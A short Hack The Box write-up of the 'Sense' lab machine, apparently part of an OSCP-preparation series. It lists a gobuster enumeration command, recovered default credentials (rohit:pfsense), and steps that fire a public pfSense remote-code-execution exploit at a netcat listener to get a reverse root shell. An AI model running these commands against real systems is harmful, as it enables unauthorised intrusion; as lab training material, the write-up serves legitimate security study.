Hack the Box is an online platform to test and advance your skills in penetration testing and cyber security.

In this series of articles we will show how junior evaluators complete some Hack The Box machines in their road to OSCP, a well-known, respected, and required for many top cybersecurity positions certification. Certified OSCPs are able to identify existing vulnerabilities and execute organized attacks in a controlled and focused manner. They can leverage or modify existing exploit code to their advantage, perform network pivoting and data exfiltration, and compromise systems due to poor configurations.

Let's start with the fun!

Sense

Initial Foothold

Port 80 redirects us to port 443 which holds a pfsense login.

Fuck this machine, you have to enumerate the webpage using the medium dirbuster wordlist and search for txt extensions: gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u https://10.10.10.60 -k -o gobuster/gobuster_txt.txt -x txt -t 50

With that, we find system-users.txt which says:

####Support ticket###

Please create the following user


username: Rohit
password: company defaults

The actual credentials are: rohit:pfsense.

From the gobuster bruteforce, we also find changelog.txt which says there is an unpatched vulnerability.

Root

Upon login, we see the version for pfsense: 2.1.3.

Doing searchsploit pfsense we find one with remote code execution for versions < 2.1.4.

1. Mirror it: searchsploit -m 43560.py.
2. Rename it: mv 43560.py exploit.py.
3. Set up a listener: ncat -lnvp 12345.
4. Fire the exploit: python3 exploit.py --rhost 10.10.10.60 --lhost 10.10.14.31 --lport 12345 --username rohit --password pfsense.
5. We get a root shell.